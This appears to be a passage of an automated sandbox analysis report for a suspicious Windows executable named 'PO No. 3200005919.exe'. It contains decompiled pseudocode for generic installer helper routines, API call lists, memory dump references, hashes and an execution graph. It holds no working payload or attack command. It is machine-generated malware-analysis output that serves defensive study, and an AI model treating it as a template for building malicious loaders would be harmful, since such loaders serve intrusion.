                                                                      				return  &(_t5[1]);
                                                                      			}





                                                                      0x00405cce
                                                                      0x00405cd8
                                                                      0x00405cdb
                                                                      0x00405ce1
                                                                      0x00405ce2
                                                                      0x00405ce3
                                                                      0x00405ceb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405ceb
                                                                      0x00405ced
                                                                      0x00405cf5

                                                                      APIs
                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO No. 3200005919.exe,C:\Users\user\Desktop\PO No. 3200005919.exe,80000000,00000003), ref: 00405CD3
                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO No. 3200005919.exe,C:\Users\user\Desktop\PO No. 3200005919.exe,80000000,00000003), ref: 00405CE3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-3370423016
                                                                      • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                      • Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
                                                                      • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                      • Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                      				void* _v0;
                                                                      				void* _t17;
                                                                      				signed int _t19;
                                                                      				void* _t20;
                                                                      				void* _t24;
                                                                      				void* _t26;
                                                                      				void* _t30;
                                                                      				void* _t36;
                                                                      				void* _t38;
                                                                      				void* _t39;
                                                                      				signed int _t41;
                                                                      				void* _t42;
                                                                      				void* _t51;
                                                                      				void* _t52;
                                                                      				signed short* _t54;
                                                                      				void* _t56;
                                                                      				void* _t59;
                                                                      				void* _t61;
                                                                      
                                                                      				 *0x1000406c = _a8;
                                                                      				 *0x10004070 = _a16;
                                                                      				 *0x10004074 = _a12;
                                                                      				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
                                                                      				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
                                                                      				_t17 = E10001243();
                                                                      				_v0 = _t17;
                                                                      				_t52 = _t17;
                                                                      				if( *_t17 == 0) {
                                                                      					L16:
                                                                      					return GlobalFree(_t17);
                                                                      				} else {
                                                                      					do {
                                                                      						_t19 =  *_t52 & 0x0000ffff;
                                                                      						_t42 = 2;
                                                                      						_t54 = _t52 + _t42;
                                                                      						_t61 = _t19 - 0x6c;
                                                                      						if(_t61 > 0) {
                                                                      							_t20 = _t19 - 0x70;
                                                                      							if(_t20 == 0) {
                                                                      								L12:
                                                                      								_t52 = _t54 + _t42;
                                                                      								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
                                                                      								L13:
                                                                      								GlobalFree(_t24);
                                                                      								goto L14;
                                                                      							}
                                                                      							_t26 = _t20 - _t42;
                                                                      							if(_t26 == 0) {
                                                                      								L10:
                                                                      								_t52 =  &(_t54[1]);
                                                                      								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
                                                                      								goto L13;
                                                                      							}
                                                                      							L7:
                                                                      							if(_t26 == 1) {
                                                                      								_t30 = GlobalAlloc(0x40, _t41 + 4);
                                                                      								 *_t30 =  *0x10004040;
                                                                      								 *0x10004040 = _t30;
                                                                      								E10001563(_t30 + 4,  *0x10004074, _t41);
                                                                      								_t59 = _t59 + 0xc;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      						if(_t61 == 0) {
                                                                      							L17:
                                                                      							_t33 =  *0x10004040;
                                                                      							if( *0x10004040 != 0) {
                                                                      								E10001563( *0x10004074, _t33 + 4, _t41);
                                                                      								_t59 = _t59 + 0xc;
                                                                      								_t36 =  *0x10004040;
                                                                      								GlobalFree(_t36);
                                                                      								 *0x10004040 =  *_t36;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      						_t38 = _t19 - 0x4c;
                                                                      						if(_t38 == 0) {
                                                                      							goto L17;
                                                                      						}
                                                                      						_t39 = _t38 - 4;
                                                                      						if(_t39 == 0) {
                                                                      							 *_t54 =  *_t54 + 0xa;
                                                                      							goto L12;
                                                                      						}
                                                                      						_t26 = _t39 - _t42;
                                                                      						if(_t26 == 0) {
                                                                      							 *_t54 =  *_t54 + 0xa;
                                                                      							goto L10;
                                                                      						}
                                                                      						goto L7;
                                                                      						L14:
                                                                      					} while ( *_t52 != 0);
                                                                      					_t17 = _v0;
                                                                      					goto L16;
                                                                      				}
                                                                      			}





















                                                                      0x100010e6
                                                                      0x100010f0
                                                                      0x100010ff
                                                                      0x1000110e
                                                                      0x10001119
                                                                      0x1000111c
                                                                      0x1000112b
                                                                      0x1000112f
                                                                      0x10001131
                                                                      0x100011d8
                                                                      0x100011de
                                                                      0x10001137
                                                                      0x10001138
                                                                      0x10001138
                                                                      0x1000113d
                                                                      0x1000113e
                                                                      0x10001140
                                                                      0x10001143
                                                                      0x1000120d
                                                                      0x10001210
                                                                      0x100011b0
                                                                      0x100011b6
                                                                      0x100011bf
                                                                      0x100011c4
                                                                      0x100011c7
                                                                      0x00000000
                                                                      0x100011c7
                                                                      0x10001212
                                                                      0x10001214
                                                                      0x10001196
                                                                      0x1000119d
                                                                      0x100011a5
                                                                      0x00000000
                                                                      0x100011a5
                                                                      0x10001161
                                                                      0x10001162
                                                                      0x1000116a
                                                                      0x10001177
                                                                      0x1000117f
                                                                      0x10001188
                                                                      0x1000118d
                                                                      0x1000118d
                                                                      0x00000000
                                                                      0x10001162
                                                                      0x10001149
                                                                      0x100011df
                                                                      0x100011df
                                                                      0x100011e6
                                                                      0x100011f3
                                                                      0x100011f8
                                                                      0x100011fb
                                                                      0x10001203
                                                                      0x10001205
                                                                      0x10001205
                                                                      0x00000000
                                                                      0x100011e6
                                                                      0x1000114f
                                                                      0x10001152
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001158
                                                                      0x1000115b
                                                                      0x100011ac
                                                                      0x00000000
                                                                      0x100011ac
                                                                      0x1000115d
                                                                      0x1000115f
                                                                      0x10001192
                                                                      0x00000000
                                                                      0x10001192
                                                                      0x00000000
                                                                      0x100011c9
                                                                      0x100011c9
                                                                      0x100011d3
                                                                      0x00000000
                                                                      0x100011d7

                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7117138785.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000001.00000002.7117107508.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117175931.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117207358.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_10000000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7117138785.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000001.00000002.7117107508.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117175931.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117207358.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_10000000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: FreeGlobal
                                                                      • String ID:
                                                                      • API String ID: 2979337801-0
                                                                      • Opcode ID: b190cc9dd3d1e30f4e9bb446a8d01187a57fbf9feee38e3336cd3af5cc5b992f
                                                                      • Instruction ID: 7ec4478948484a3efbde3259273d1230314364826f96ef02c421835a9b91458a
                                                                      • Opcode Fuzzy Hash: b190cc9dd3d1e30f4e9bb446a8d01187a57fbf9feee38e3336cd3af5cc5b992f
                                                                      • Instruction Fuzzy Hash: 1041487590064ADFEB20CFA8C8806DEB7F4FF08394F21452AE1A9E3244D770AA85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00405E07(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                      				int _v8;
                                                                      				int _t12;
                                                                      				int _t14;
                                                                      				int _t15;
                                                                      				CHAR* _t17;
                                                                      				CHAR* _t27;
                                                                      
                                                                      				_t12 = lstrlenA(_a8);
                                                                      				_t27 = _a4;
                                                                      				_v8 = _t12;
                                                                      				while(lstrlenA(_t27) >= _v8) {
                                                                      					_t14 = _v8;
                                                                      					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                      					_t15 = lstrcmpiA(_t27, _a8);
                                                                      					_t27[_v8] =  *(_t14 + _t27);
                                                                      					if(_t15 == 0) {
                                                                      						_t17 = _t27;
                                                                      					} else {
                                                                      						_t27 = CharNextA(_t27);
                                                                      						continue;
                                                                      					}
                                                                      					L5:
                                                                      					return _t17;
                                                                      				}
                                                                      				_t17 = 0;
                                                                      				goto L5;
                                                                      			}









                                                                      0x00405e17
                                                                      0x00405e19
                                                                      0x00405e1c
                                                                      0x00405e48
                                                                      0x00405e21
                                                                      0x00405e2a
                                                                      0x00405e2f
                                                                      0x00405e3a
                                                                      0x00405e3d
                                                                      0x00405e59
                                                                      0x00405e3f
                                                                      0x00405e46
                                                                      0x00000000
                                                                      0x00405e46
                                                                      0x00405e52
                                                                      0x00405e56
                                                                      0x00405e56
                                                                      0x00405e50
                                                                      0x00000000

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
                                                                      • CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                      • Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
                                                                      • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                      • Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:3.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:19
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 384 1684a7d 386 166183b 384->386 387 16847e5 384->387 385 1684654 TerminateThread 385->386 386->385 386->387 380 1684b91 383 166183b 380->383 381 1684654 TerminateThread 381->383 382 16847e5 383->381 383->382 395 16846f1 396 166183b 395->396 396->395 397 16847e5 396->397 398 1684654 TerminateThread 396->398 398->396 391 1684702 392 166183b 391->392 393 16846c9 392->393 394 1684654 TerminateThread 392->394 394->392 388 1684654 TerminateThread 390 166183b 388->390 389 16847e5 390->388 390->389

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.7237812331.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_1660000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: TerminateThread
                                                                      • String ID:
                                                                      • API String ID: 1852365436-0
                                                                      • Opcode ID: 63531507572132776b34a64073a46a027923463554f88a38307d8fe225ec3d07
                                                                      • Instruction ID: 2b65c7babbc8d0e6e11c35657a047c3938b44bb0e36e0f250ae81977067c6e8c
                                                                      • Opcode Fuzzy Hash: 63531507572132776b34a64073a46a027923463554f88a38307d8fe225ec3d07
                                                                      • Instruction Fuzzy Hash: D131046450875B9EEF227D28CCE03EA3B969F67350F8A8159CCC51B146D32545CBC607
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%